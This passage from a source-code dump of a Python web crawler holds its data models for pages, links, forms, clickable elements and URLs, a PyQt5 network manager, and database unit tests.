96 | elif self.html_class == other and self.id == other.id and self.event == other.event and levenshtein < 4:
97 | return True
98 | else:
99 | return False
--------------------------------------------------------------------------------
/crawler/models/clickabletype.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from enum import Enum
19 |
20 | class ClickableType(Enum):
21 | UIChange = 0
22 | Link = 1
23 | CreatesNewNavigatables = 2
24 | Error = 3
25 | SendingAjax = 4
26 | IgnoredByCrawler = 5
27 | UnsupportedEvent = 6
28 | CreateNewWindow = 7
--------------------------------------------------------------------------------
/crawler/models/deltapage.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 |
19 | from models.webpage import WebPage
20 |
21 | class DeltaPage(WebPage):
22 |
23 | def __init__(self, id, url = None, html = None, cookiesjar = None, depth = None, generator = None, parent_id = None, delta_depth = None, base_url = None):
24 | WebPage.__init__(self, id, url, html, cookiesjar, depth, base_url=base_url)
25 | self.generator = generator
26 | self.generator_requests = []
27 | self.parent_id = parent_id
28 | self.delta_depth = delta_depth
29 |
30 | def toString(self):
31 | msg = "[ Page: " + str(self.url) + " - ID: " + str(self.id) + " - Depth:" + str(self.current_depth) +" \n"
32 | msg += "Parent-ID: " + str(self.parent_id) + " - Generator: " + self.generator.toString() + " - Delta Depth: " + str(self.delta_depth) + " \n"
33 | if len(self.generator_requests) > 0:
34 | msg += "Generator AsyncRequests: \n"
35 | for r in self.generator_requests:
36 | msg += " - " + r.toString() + " \n"
37 | if len(self.clickables) > 0:
38 | msg += "Clickable: \n"
39 | for elem in self.clickables:
40 | msg += elem.toString() + " \n"
41 | if len(self.timing_requests) > 0:
42 | msg += "Timingrequests: \n"
43 | for elem in self.timing_requests:
44 | msg += elem.toString() + " \n"
45 | if len(self.links) > 0:
46 | msg += "Static Links: \n"
47 | for link in self.links:
48 | tmp = link.toString()
49 | msg += tmp + " \n"
50 | if len(self.forms) > 0:
51 | msg += "Forms: \n"
52 | for elem in self.forms:
53 | msg += elem.toString() + " \n"
54 | return msg + "]"
55 |
56 |
57 |
--------------------------------------------------------------------------------
/crawler/models/enumerations.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 | from enum import Enum
18 |
19 | class XHRBehavior(Enum):
20 | IgnoreXHR = 0
21 | ObserveXHR = 1
22 | InterceptXHR = 2
23 |
--------------------------------------------------------------------------------
/crawler/models/form.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 |
19 | import hashlib
20 |
21 |
22 | class HtmlForm():
23 | def __init__(self, parameters, action, method, dom_address=None):
24 | self.parameter = parameters # Array of FormInput's
25 | self.parameter = sorted(self.parameter, key=lambda parameter: parameter.name if parameter.name is not None else "")
26 | self.action = action
27 | self.method = method
28 | self.dom_address = dom_address
29 |
30 | @property
31 | def form_hash(self):
32 | return self.get_hash()
33 |
34 | def toString(self):
35 | msg = "[Form: Action: '" + self.action.abstract_url + "' Method:' " + self.method + " - Formhash: " + self.get_hash() + " \n"
36 | if self.dom_address is not None:
37 | msg += "Dom Address: " + self.dom_address + " \n"
38 | for elem in self.parameter:
39 | msg += "[Param: " + str(elem.tag) + " Name: " + str(elem.name) + " Inputtype: " + str(
40 | elem.input_type) + " Values: " + str(elem.values) + "] \n"
41 | return msg + "]"
42 |
43 | def hasSubmit(self):
44 | return self.submit != None
45 |
46 | def __eq__(self, other):
47 | if not isinstance(other, self.__class__):
48 | return False
49 | return self.get_hash() == other.get_hash()
50 |
51 | def __ne__(self, other):
52 | return not self.__eq__(other)
53 |
54 | def get_hash(self):
55 | s_to_hash = self.action.abstract_url + ";" + self.method + ";"
56 | for p in self.parameter:
57 | s_to_hash += str(p.name) + ";" + p.tag + ";" + str(p.input_type) + ";"
58 | b_to_hash = s_to_hash.encode("utf-8")
59 | d = hashlib.md5()
60 | d.update(b_to_hash)
61 | return d.hexdigest()
62 |
63 |
64 | class FormInput():
65 | def __init__(self, tag, name, input_type="", values=None):
66 | self.tag = tag
67 | self.name = name
68 | self.values = values
69 | self.input_type = input_type
70 |
71 | def __eq__(self, other):
72 | if not isinstance(other, self.__class__):
73 | return False
74 | if self.values is not None:
75 | for val in self.values:
76 | if other.values is None or not val in other.values:
77 | return False
78 | return self.tag == other.tag and self.name == other.name and self.input_type == other.input_type
79 |
80 | def __ne__(self, other):
81 | return not self.__eq__(other)
82 |
83 | def toString(self):
84 | return "[Param: " + str(self.tag) + " Name: " + str(self.name) + " Inputtype: " + str(
85 | self.input_type) + " Values: " + str(self.values) + "] \n"
86 |
87 |
88 | class InputField():
89 | def __init__(self, input_type, html_id=None, html_class=None, value=None):
90 | self.input_type = input_type
91 | self.html_id = html_id
92 | self.html_class = html_class
93 | self.value = value # Predifiend value, if available...
94 |
--------------------------------------------------------------------------------
/crawler/models/keyclickable.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from models.clickable import Clickable
19 | from models.clickabletype import ClickableType
20 |
21 | class KeyClickable(Clickable):
22 |
23 | def __init__(self, clickable, key_event):
24 | Clickable.__init__(self, clickable.event, clickable.tag, clickable.dom_address, clickable.id, clickable.html_class, clickable.clickable_depth, clickable.function_id)
25 | self.random_char = key_event #Is the key typed in for triggering the clickabel
26 |
27 | def toString(self):
28 | msg = ""
29 | msg += "[TAG: " + self.tag
30 | if self.id is not None and not self.id == "":
31 | msg += " - ID: " + self.id
32 | if self.event is not None and not self.event == "":
33 | msg += " - Event: " + self.event
34 | if self.html_class is not None and not self.html_class == "":
35 | msg += " - Class: " + self.html_class
36 | msg += " - Domadress: " + self.dom_address
37 | if self.links_to is not None:
38 | msg += " - Links to: " + self.links_to
39 | if self.clickable_depth is not None:
40 | msg += " - Clickable Depth: " + str(self.clickable_depth)
41 | if self.function_id is not None:
42 | msg += " - FunctionID: " + self.function_id
43 | if self.clickable_type is not None:
44 | if self.clickable_type == ClickableType.CreatesNewNavigatables:
45 | msg += " - ClickableType: Create_new_navigatable"
46 | elif self.clickable_type == ClickableType.Link:
47 | msg += " - ClickableType: Link"
48 | elif self.clickable_type == ClickableType.SendingAjax:
49 | msg += " - ClickableType: SendingAjax"
50 | elif self.clickable_type == ClickableType.UIChange:
51 | msg += " - ClickableType: UiChange"
52 | elif self.clickable_type == ClickableType.Error:
53 | msg += " - ClickableType: Error"
54 | if self.random_char is not None:
55 | msg += self.random_char
56 | msg += "]"
57 | return msg
--------------------------------------------------------------------------------
/crawler/models/link.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | class Link():
19 |
20 | def __init__(self, url, dom_address, html_id = "", html_class = ""):
21 | self.url = url
22 | self.dom_address = dom_address
23 | self.html_id = html_id
24 | self.html_class = html_class
25 |
26 | def toString(self):
27 | res = "["
28 | res += "A-HREF: " + self.url.abstract_url + " - {}".format(self.url.url_hash)
29 | res += " - Domadress: " + self.dom_address
30 | if self.html_id != "":
31 | res += " - ID: " + self.html_id
32 | if self.html_class != "":
33 | res += " - Class: " + self.html_class
34 | res += "]"
35 | return res
36 |
37 | def __eq__(self, other):
38 | if not isinstance(other, self.__class__):
39 | return False
40 | return self.url == other.url
41 |
42 | def __ne__(self, other):
43 | return not self.__eq__(other)
44 |
--------------------------------------------------------------------------------
/crawler/models/parametertype.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from enum import Enum
19 |
20 | __author__ = 'constantin'
21 |
22 | class ParameterType(Enum):
23 | """
24 | This describes the type of the parameters:
25 | - Digit: Single digit, exp: 0,1,2, ...
26 | - Float: Float value, exp: 1.5, 99,32, 3,1415...
27 | - Char; Single digit, float or character, exp: a, B, X, 5, ...
28 | - Integer: Normal Integer > 9, exp, 23, 39, 42, ...
29 | - String: String contains only Characters, exp: Turing, Captain Jack
30 | - Alpha-Numerical: Contains the rest, exp: diofjiodjr23jreß9324jr3j0ew9rj 0r9 j3029j
31 |
32 | """
33 | Digit = 0
34 | Float = 1
35 | Char = 2
36 | Integer = 3
37 | String = 4
38 | AlphaNumerical = 5
39 | NoParameter = 6
40 |
--------------------------------------------------------------------------------
/crawler/models/timingrequest.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 |
19 | from models.asyncrequests import AsyncRequests
20 |
21 |
22 | class TimingRequest(AsyncRequests):
23 | '''
24 | Models an Ajax-Request issued after timeout or intervall
25 | '''
26 | def __init__(self, method, url, time, event, parameters=None):
27 | super(TimingRequest, self).__init__(method, url, parameters)
28 | self.event = event #Timout or Intervall
29 | self.time = time
30 |
31 | def toString(self):
32 | return "[Timing - Method: " + str(self.method) + " - Url: "+ str(self.url.toString()) + " - Trigger: " + str(self.event) + "]"
33 |
--------------------------------------------------------------------------------
/crawler/models/url.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | import hashlib
19 | from urllib.parse import urlparse
20 |
21 |
22 | class Url():
23 | def __init__(self, url, depth_of_finding = None):
24 | self.complete_url = url
25 | parsed_url = urlparse(url)
26 | self.scheme = parsed_url.scheme
27 | self.domain = parsed_url.netloc
28 | if parsed_url.path != "/":
29 | self.path = parsed_url.path
30 | else:
31 | self.path = ""
32 | self.query = parsed_url.query
33 | self.fragment = parsed_url.fragment
34 |
35 | self.parameters = {}
36 | self.depth_of_finding = depth_of_finding
37 | self.url_structure = None
38 | self.abstract_url = None
39 |
40 | if len(parsed_url.query) > 0:
41 | query_splitted = self.query.split("&")
42 | for splits in query_splitted:
43 | tmp = splits.split("=")
44 | if len(tmp) == 2:
45 | param_name = tmp[0]
46 | param_value = tmp[1]
47 | else:
48 | param_name = tmp[0]
49 | param_value = None
50 | if param_name in self.parameters:
51 | self.parameters[param_name].append(param_value)
52 | else:
53 | self.parameters[param_name] = [param_value]
54 | keys = self.parameters.keys()
55 | keys = sorted(keys)
56 | tmp_params = {}
57 | for key in keys:
58 | tmp_params[key] = self.parameters[key]
59 | self.parameters = tmp_params
60 |
61 | self.url_hash = self.get_hash()
62 |
63 | def get_values_to_parameter(self, parameter_name):
64 | if parameter_name not in self.parameters:
65 | raise KeyError("{} is not in parameters".format(parameter_name))
66 | return self.parameters[parameter_name]
67 |
68 | def get_url_description(self):
69 | return self.url_structure
70 |
71 | def get_path(self):
72 | result = self.scheme + "://" + self.domain
73 | if self.path is not None and len(self.path) > 0:
74 | if self.path[0] == "/":
75 | result = self.scheme + "://" + self.domain + self.path
76 | else:
77 | result = self.scheme + "://" + self.domain + "/" + self.path
78 | return result
79 | else:
80 | return ""
81 |
82 | def get_hash(self):
83 | s_to_hash = self.path
84 | for k in self.parameters:
85 | s_to_hash += "++" + k
86 | b_to_hash = s_to_hash.encode("utf-8")
87 | d = hashlib.md5()
88 | d.update(b_to_hash)
89 | return d.hexdigest()
90 |
91 | def toString(self):
92 | return self.complete_url
93 |
94 | def has_equal_description(self, other):
95 | if not isinstance(other, self.___class__):
96 | return False
97 | return self.url_hash == other.url_hash
98 |
99 | def equal_abstract_url(self, other):
100 | if not isinstance(other, self.__class__):
101 | return False
102 | return self.abstract_url == other.abstract_url
103 |
104 | def __eq__(self, other):
105 | if not isinstance(other, self.__class__):
106 | return False
107 | return self.toString() == other.toString()
108 |
109 | def __ne__(self, other):
110 | return not self.__eq__(other)
--------------------------------------------------------------------------------
/crawler/models/urlstructure.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from enum import Enum
19 | import hashlib
20 | from models.parametertype import ParameterType
21 |
22 | __author__ = 'constantin'
23 |
24 |
25 | class UrlStructure():
26 |
27 | def __init__(self, path, paramters = {}, url_hash = None):
28 | self.path = path
29 | self.parameters = paramters # List of dict: parametername, parametertype, origin, generating <= change of the param creates a new page
30 | self.url_hash = url_hash
31 |
32 | def get_parameter_type(self, parameter_name):
33 | if parameter_name not in self.parameters:
34 | raise KeyError("{} not found".format(parameter_name))
35 | return ParameterType(self.parameters[parameter_name]['parameter_type'])
36 |
37 | def get_parameter_origin(self, parameter_name):
38 | if parameter_name not in self.parameters:
39 | raise KeyError("{} not found".format(parameter_name))
40 | return ParameterType(self.parameters[parameter_name]['origin'])
41 |
42 | def toString(self):
43 | msg = "[Url: {} \n".format(self.path)
44 | for param in self.parameters:
45 | msg += "{} - {} - {} - {} \n".format(param, ParameterType(self.parameters[param]['parameter_type']), ParameterOrigin(self.parameters[param]['origin']), self.parameters[param]['generating'])
46 | msg += "Hash: {}]".format(self.url_hash)
47 | return msg
48 |
49 | class ParameterOrigin(Enum):
50 | ServerGenerated = 0
51 | ClientGenerated = 1
52 |
53 |
--------------------------------------------------------------------------------
/crawler/models/utils.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from enum import Enum
19 |
20 |
21 | def levenshtein(s1, s2):
22 | if len(s1) < len(s2):
23 | return levenshtein(s2, s1)
24 |
25 | # len(s1) >= len(s2)
26 | if len(s2) == 0:
27 | return len(s1)
28 |
29 | previous_row = range(len(s2) + 1)
30 | for i, c1 in enumerate(s1):
31 | current_row = [i + 1]
32 | for j, c2 in enumerate(s2):
33 | insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer
34 | deletions = current_row[j] + 1 # than s2
35 | substitutions = previous_row[j] + (c1 != c2)
36 | current_row.append(min(insertions, deletions, substitutions))
37 | previous_row = current_row
38 |
39 | return previous_row[-1]
40 |
41 |
42 | class CrawlSpeed(Enum):
43 | Slow = 0
44 | Medium = 1
45 | Fast = 2
46 | Speed_of_Lightning = 3
47 |
48 |
49 | def purge_dublicates(X):
50 | unique_X = []
51 | for i, row in enumerate(X):
52 | if row not in X[i + 1:]:
53 | unique_X.append(row)
54 | return unique_X
--------------------------------------------------------------------------------
/crawler/models/webpage.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | class WebPage:
19 |
20 | def __init__(self, id, url = None, html = None, cookiesjar = None, depth = None, base_url = None):
21 | self.id = id
22 | self.cookiejar = cookiesjar
23 | self.url = url
24 | self.html = html
25 | self.clickables = []
26 | self.timing_requests = []
27 | self.links = []
28 | self.forms = []
29 | self.current_depth = depth
30 | self.ajax_requests = []
31 | self.base_url = None # Defines if a page contains a tag
32 |
33 | def toString(self):
34 | try:
35 | url = self.url.toString()
36 | except AttributeError:
37 | url = self.url
38 | msg = "[ Page: " + url + " - ID: " + str(self.id) + " - Depth:" + str(self.current_depth) + " \n"
39 | if len(self.clickables) > 0:
40 | msg += "Clickable: \n"
41 | for elem in self.clickables:
42 | msg += elem.toString() + " \n"
43 | if len(self.timing_requests) > 0:
44 | msg += "Timingrequests: \n"
45 | for elem in self.timing_requests:
46 | msg += elem.toString() + " \n"
47 | if len(self.links) > 0:
48 | msg += "Static Links: \n"
49 | for link in self.links:
50 | tmp = link.toString()
51 | msg += tmp + " \n"
52 | if len(self.forms) > 0:
53 | msg += "Forms: \n"
54 | for elem in self.forms:
55 | msg += elem.toString() + " \n"
56 | if len(self.ajax_requests) > 0:
57 | msg += "Ajax-AsyncRequests: \n"
58 | for elem in self.ajax_requests:
59 | msg += elem.toString() + " \n"
60 | return msg + "]"
61 |
--------------------------------------------------------------------------------
/crawler/network/__init__.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 |
--------------------------------------------------------------------------------
/crawler/network/network.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from PyQt5.Qt import QNetworkAccessManager, QDesktopServices, QNetworkDiskCache
19 | import logging
20 | from PyQt5.QtNetwork import QHttpMultiPart, QHttpPart
21 |
22 |
23 | class NetWorkAccessManager(QNetworkAccessManager):
24 |
25 | def __init__(self, parent, cache_size = 100, cache_dir='.webkit_cache'):
26 | super(NetWorkAccessManager, self).__init__(parent)
27 | self.finished.connect(self._finished)
28 | cache = QNetworkDiskCache()
29 | cache.setCacheDirectory(cache_dir)
30 | cache.setMaximumCacheSize(cache_size * 1024 * 1024) # need to convert cache value to bytes
31 | self.setCache(cache)
32 |
33 | def _finished(self, reply):
34 | reply.deleteLater()
35 |
36 | def createRequest(self, op, req, device=None):
37 | self.reply = None
38 | """
39 | if op == 1:
40 | logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("Head",req.url().toString()))
41 | elif op == 2:
42 | logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("GET",req.url().toString()))
43 | elif op == 3:
44 | logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("PUT",req.url().toString()))
45 | elif op == 4:
46 | logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("POST",req.url().toString()))
47 | elif op == 5:
48 | logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("Delete",req.url().toString()))
49 | else:
50 | logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("CUSTOM",req.url().toString()))
51 | """
52 | reply = QNetworkAccessManager.createRequest(self, op, req, device)
53 | #reply = NetworkReply(self, reply)
54 | return reply
55 |
56 | def __del__(self):
57 | self = None
58 |
--------------------------------------------------------------------------------
/crawler/tests/__init__.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | __author__ = 'constantin'
19 |
--------------------------------------------------------------------------------
/crawler/tests/databasetest.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | import logging
19 | from copy import deepcopy
20 | from database.database import Database
21 | from models.ajaxrequest import AjaxRequest
22 | from models.clickable import Clickable
23 | from models.clickabletype import ClickableType
24 | from models.form import HtmlForm, FormInput
25 | from models.url import Url
26 | from models.webpage import WebPage
27 |
28 | __author__ = 'constantin'
29 |
30 | import unittest
31 |
32 | SESSION = 12345
33 | WEBPAGE_ID = 99
34 | TEST_URL1 = "http://example.com"
35 | TEST_URL2 = "http://example.com/exmaple.php"
36 | TEST_HTML = ""
37 | CLICKABLE = Clickable("click", "a", "body/div/div/a", id = "Test1", html_class = "Test2", clickable_depth = 243, function_id = "Test3")
38 | WEBPAGE = WebPage(1, url= TEST_URL1, html= TEST_HTML, cookiesjar= None, depth= 24, base_url= TEST_URL2)
39 | AJAXREQUEST = AjaxRequest("GET", TEST_URL1, CLICKABLE, parameters=["test=Test"])
40 |
41 |
42 | class DataBaseTests(unittest.TestCase):
43 |
44 | def setUp(self):
45 | self.database = Database("DataBaseUnit")
46 |
47 |
48 | def test_url_set_and_get(self):
49 | url = Url(TEST_URL1, depth_of_finding=3)
50 | self.database.insert_url_into_db(SESSION, url)
51 | url2 = self.database.get_next_url_for_crawling(SESSION)
52 | self.assertEqual(url, url2)
53 | self.assertEqual(url2.depth_of_finding, 3)
54 |
55 | def test_url_visit(self):
56 | url1 = Url(TEST_URL1, depth_of_finding=3)
57 | url2 = Url(TEST_URL2, depth_of_finding=25)
58 |
59 | self.database.insert_url_into_db(SESSION, url1)
60 | self.database.insert_url_into_db(SESSION, url2)
61 |
62 | url3 = self.database.get_next_url_for_crawling(SESSION)
63 | self.database.visit_url(SESSION, url3, 25, 200)
64 | url4 = self.database.get_next_url_for_crawling(SESSION)
65 |
66 | self.assertEqual(url1, url3)
67 | self.assertEqual(url2, url4)
68 |
69 | def test_url_set(self):
70 | url1 = Url(TEST_URL1, depth_of_finding=3)
71 | url2 = Url(TEST_URL2, depth_of_finding=25)
72 |
73 | self.database.insert_url_into_db(SESSION, url1)
74 | self.assertEqual(self.database.urls.count(), 1)
75 | self.database.insert_url_into_db(SESSION, url1)
76 | self.assertEqual(self.database.urls.count(), 1)
77 | self.database.insert_url_into_db(SESSION, url2)
78 | self.assertEqual(self.database.urls.count(), 2)
79 |
80 |
81 | def test_clickables(self):
82 | clickable1 = Clickable("click", "a", "body/div/div/a", id = "Test1", html_class = "Test2", clickable_depth = 243, function_id = "Test3")
83 | self.database._insert_clickable_into_db(SESSION, WEBPAGE_ID, clickable1)
84 |
85 | clickables = self.database.get_all_clickables_to_page_id_from_db(SESSION,WEBPAGE_ID)
86 | self.assertEqual(len(clickables), 1)
87 | self.assertEqual(clickable1, clickables[0])
88 |
89 | self.database.set_clickable_clicked(SESSION, WEBPAGE_ID, clickable1.dom_address, clickable1.event, clickable_depth=243, clickable_type=ClickableType.CreatesNewNavigatables)
90 |
91 | clickables = self.database.get_all_clickables_to_page_id_from_db(SESSION,WEBPAGE_ID)
92 | self.assertEqual(len(clickables), 1)
93 | clickable1.clicked = True
94 | clickable1.clickable_type = ClickableType.CreatesNewNavigatables
95 | self.assertEqual(clickable1, clickables[0])
96 |
97 | def test_webpage(self):
98 | clickable1 = Clickable("click", "a", "body/div/div/a", id = "Test1", html_class = "Test2", clickable_depth = 243, function_id = "Test3")
99 | web_page = WebPage(1, url= TEST_URL1, html= TEST_HTML, cookiesjar= None, depth= 24, base_url= TEST_URL2)
100 | web_page.clickables.extend([clickable1])
101 | self.database.insert_page_into_db(SESSION, web_page)
102 | web_page1 = self.database.get_webpage_to_id_from_db(SESSION, 1)
103 | self.assertEqual(web_page.toString(), web_page1.toString())
104 | web_page2 = self.database.get_webpage_to_url_from_db(SESSION, TEST_URL1)
105 | self.assertEqual(web_page.toString(), web_page2.toString())
106 |
107 | def test_form1(self):
108 | form_input1 = FormInput("INPUT", "Username", input_type="text", values=None)
109 | form_input2 = FormInput("INPUT", "Password", input_type="password", values=None)
110 | form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
111 |
112 | self.database.insert_form(SESSION,form, WEBPAGE_ID)
113 | self.assertEqual(self.database.forms.count(), 1)
114 | form1 = self.database.get_all_forms_to_page_id_from_db(SESSION,WEBPAGE_ID)
115 | self.assertEqual(form, form1[0])
116 | self.assertEqual(form.toString(), form1[0].toString())
117 |
118 | def test_similar_forms(self):
119 | form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Thomas"])
120 | form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"])
121 | form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
